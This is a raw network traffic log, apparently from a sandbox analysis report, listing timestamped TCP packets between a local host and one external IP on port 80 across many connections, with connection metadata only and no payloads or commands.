Jan 8, 2025 18:09:07.243473053 CET | 80 | 50035 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.524365902 CET | 80 | 50034 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.577440977 CET | 50034 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:07.593512058 CET | 50035 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:07.598321915 CET | 80 | 50035 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.598493099 CET | 80 | 50035 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.656455040 CET | 80 | 50034 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.716927052 CET | 50034 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:07.788615942 CET | 50034 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:07.791898012 CET | 50036 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:07.793661118 CET | 80 | 50034 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.793740988 CET | 50034 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:07.796747923 CET | 80 | 50036 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.796821117 CET | 50036 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:07.798317909 CET | 50036 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:07.803106070 CET | 80 | 50036 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.929986954 CET | 80 | 50035 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:08.014975071 CET | 50035 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:08.062575102 CET | 80 | 50035 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:08.164318085 CET | 50036 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:08.169310093 CET | 80 | 50036 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:08.169323921 CET | 80 | 50036 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:08.169332027 CET | 80 | 50036 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:08.218044996 CET | 50035 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:08.469192982 CET | 80 | 50036 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:08.598748922 CET | 80 | 50036 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:08.598849058 CET | 50036 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:08.766871929 CET | 50035 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:08.766937971 CET | 50036 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:08.767263889 CET | 50037 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:08.772073030 CET | 80 | 50035 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:08.772098064 CET | 80 | 50036 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:08.772109032 CET | 80 | 50037 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:08.772167921 CET | 50035 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:08.772198915 CET | 50036 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:08.772233009 CET | 50037 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:08.772443056 CET | 50037 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:08.777364016 CET | 80 | 50037 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:09.162511110 CET | 50037 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:09.167367935 CET | 80 | 50037 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:09.167386055 CET | 80 | 50037 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:09.167396069 CET | 80 | 50037 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:09.454893112 CET | 80 | 50037 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:09.586425066 CET | 80 | 50037 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:09.586494923 CET | 50037 | 80 | 192.168.2.4 | 185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.703167915 CET5003780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.703435898 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.708138943 CET8050037185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:09.708210945 CET5003780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.708257914 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:09.708328009 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.708439112 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.713160038 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.074676037 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.079638004 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.079653978 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.079663038 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.372292042 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.425982952 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.502743959 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.608671904 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.624299049 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.628839016 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.629234076 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.629283905 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.633647919 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.633716106 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.635338068 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.640132904 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.983937979 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.988811016 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.988831997 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.988873959 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.337697983 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.470454931 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.470536947 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.594988108 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.595115900 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.599931002 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.599946976 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.599997997 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.600019932 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.600148916 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.604913950 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.952824116 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.957709074 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.957721949 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.957731009 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.299433947 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.405592918 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.432261944 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.514986992 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.562753916 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.563179016 CET5004180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.567737103 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.567799091 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.568095922 CET8050041185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.568171978 CET5004180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.568342924 CET5004180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.573132038 CET8050041185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.921427011 CET5004180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.926346064 CET8050041185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.926359892 CET8050041185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.926367998 CET8050041185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.099616051 CET5004280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:13.104427099 CET8050042185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.104502916 CET5004280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:13.105299950 CET5004280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:13.110083103 CET8050042185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.231827974 CET8050041185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.280673027 CET5004180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:13.363259077 CET8050041185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.452691078 CET5004280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:13.458286047 CET8050042185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.458306074 CET8050042185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.468136072 CET5004180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:13.490421057 CET5004180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:13.490772009 CET5004380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:13.495457888 CET8050041185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.495541096 CET8050043185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.495598078 CET5004180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:13.495630980 CET5004380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:13.495764017 CET5004380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:13.500642061 CET8050043185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.768513918 CET8050042185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.843781948 CET5004380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:13.848757029 CET8050043185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.848773003 CET8050043185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.848783016 CET8050043185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.918092012 CET8050042185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:13.921060085 CET5004280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:14.168071032 CET8050043185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:14.218065023 CET5004380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:14.298655033 CET8050043185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:14.405585051 CET5004380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:14.424017906 CET5004280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:14.424206972 CET5004380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:14.424348116 CET5004480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:14.429066896 CET8050042185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:14.429157972 CET8050044185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:14.429163933 CET5004280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:14.429227114 CET5004480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:14.429269075 CET8050043185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:14.429313898 CET5004380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:14.429406881 CET5004480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:14.434180975 CET8050044185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:14.786175966 CET5004480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:14.790997028 CET8050044185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:14.791008949 CET8050044185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:14.791019917 CET8050044185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:15.123116970 CET8050044185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:15.171181917 CET5004480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:15.254828930 CET8050044185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:15.394509077 CET5004480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:15.394843102 CET5004580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:15.399447918 CET8050044185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:15.399518013 CET5004480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:15.399605989 CET8050045185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:15.399669886 CET5004580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:15.399936914 CET5004580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:15.404722929 CET8050045185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:15.749696970 CET5004580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:15.754630089 CET8050045185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:15.754643917 CET8050045185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:15.754654884 CET8050045185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:16.094341993 CET8050045185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:16.139939070 CET5004580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:16.226859093 CET8050045185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:16.280544043 CET5004580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:16.342624903 CET5004580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:16.342874050 CET5004680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:16.347666979 CET8050046185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:16.347745895 CET5004680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:16.347791910 CET8050045185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:16.347830057 CET5004680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:16.347848892 CET5004580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:16.353610992 CET8050046185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:16.703178883 CET5004680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:16.708161116 CET8050046185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:16.708175898 CET8050046185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:16.708180904 CET8050046185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:17.039618015 CET8050046185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:17.093036890 CET5004680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:17.172380924 CET8050046185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:17.218128920 CET5004680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:17.299566984 CET5004680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:17.299798965 CET5004780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:17.304512024 CET8050046185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:17.304588079 CET5004680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:17.304667950 CET8050047185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:17.304744005 CET5004780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:17.304862976 CET5004780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:17.309665918 CET8050047185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:17.656682968 CET5004780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:17.661564112 CET8050047185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:17.661577940 CET8050047185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:17.661585093 CET8050047185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:17.977551937 CET8050047185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:18.110521078 CET8050047185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:18.110599995 CET5004780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:18.268064976 CET5004780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:18.268573046 CET5004880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:18.273085117 CET8050047185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:18.273140907 CET5004780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:18.273432016 CET8050048185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:18.273507118 CET5004880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:18.273616076 CET5004880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:18.278410912 CET8050048185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:18.625621080 CET5004880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:18.630484104 CET8050048185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:18.630527973 CET8050048185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:18.630537987 CET8050048185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:18.940305948 CET5004980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:18.946393967 CET8050049185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:18.946580887 CET5004980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:18.946580887 CET5004980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:18.953660965 CET8050049185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:18.971453905 CET8050048185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:19.014938116 CET5004880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:19.104218006 CET8050048185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:19.155591965 CET5004880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:19.242762089 CET5004880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:19.243036032 CET5005080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:19.247879028 CET8050050185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:19.247957945 CET5005080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:19.248172045 CET5005080192.168.2.4185.177.239.66
Jan 8, 2025 18:09:19.248377085 CET | 80 | 50048 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:19.248430967 CET | 50048 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:19.252971888 CET | 80 | 50050 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:19.296367884 CET | 50049 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:19.301222086 CET | 80 | 50049 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:19.301234007 CET | 80 | 50049 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:19.594573975 CET | 50050 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:19.751403093 CET | 80 | 50049 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:19.752455950 CET | 80 | 50050 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:19.752652884 CET | 80 | 50050 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:19.752820969 CET | 80 | 50050 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:19.775466919 CET | 80 | 50049 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:19.775692940 CET | 50049 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:19.938519001 CET | 80 | 50050 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:20.071338892 CET | 80 | 50050 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:20.071404934 CET | 50050 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:20.210800886 CET | 50049 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:20.210802078 CET | 50050 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:20.210978985 CET | 50051 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:20.215738058 CET | 80 | 50050 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:20.215759993 CET | 80 | 50051 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:20.215821028 CET | 50050 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:20.215861082 CET | 50051 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:20.216026068 CET | 50051 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:20.216042995 CET | 80 | 50049 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:20.216089010 CET | 50049 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:20.220782995 CET | 80 | 50051 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:20.564621925 CET | 50051 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:20.569523096 CET | 80 | 50051 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:20.569535017 CET | 80 | 50051 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:20.569544077 CET | 80 | 50051 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:20.921646118 CET | 80 | 50051 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:20.968055964 CET | 50051 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:21.034898043 CET | 80 | 50051 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:21.077425003 CET | 50051 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:21.169534922 CET | 50051 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:21.169801950 CET | 50052 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:21.174642086 CET | 80 | 50051 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:21.174665928 CET | 80 | 50052 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:21.174704075 CET | 50051 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:21.174768925 CET | 50052 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:21.174838066 CET | 50052 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:21.179650068 CET | 80 | 50052 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:21.531337023 CET | 50052 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:21.536264896 CET | 80 | 50052 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:21.536283970 CET | 80 | 50052 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:21.536293983 CET | 80 | 50052 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:21.864082098 CET | 80 | 50052 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:21.905704975 CET | 50052 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:21.998403072 CET | 80 | 50052 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:22.046180010 CET | 50052 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:22.139345884 CET | 50052 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:22.139620066 CET | 50053 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:22.144431114 CET | 80 | 50052 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:22.144458055 CET | 80 | 50053 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:22.144514084 CET | 50052 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:22.144571066 CET | 50053 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:22.144668102 CET | 50053 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:22.149463892 CET | 80 | 50053 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:22.500210047 CET | 50053 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:22.505059958 CET | 80 | 50053 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:22.505074024 CET | 80 | 50053 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:22.505084991 CET | 80 | 50053 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:22.864509106 CET | 80 | 50053 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:22.905586004 CET | 50053 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:23.000451088 CET | 80 | 50053 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:23.046185970 CET | 50053 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:23.128546953 CET | 50053 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:23.128719091 CET | 50054 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:23.133574009 CET | 80 | 50053 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:23.133588076 CET | 80 | 50054 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:23.133642912 CET | 50053 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:23.133687019 CET | 50054 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:23.133805037 CET | 50054 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:23.138573885 CET | 80 | 50054 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:23.624526024 CET | 50054 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:23.629393101 CET | 80 | 50054 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:23.629405022 CET | 80 | 50054 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:23.629415035 CET | 80 | 50054 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:23.823512077 CET | 80 | 50054 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:23.874402046 CET | 50054 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:23.954796076 CET | 80 | 50054 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:23.999275923 CET | 50054 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:24.095072031 CET | 50054 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:24.095432997 CET | 50055 | 80 | 192.168.2.4 | 185.177.239.66
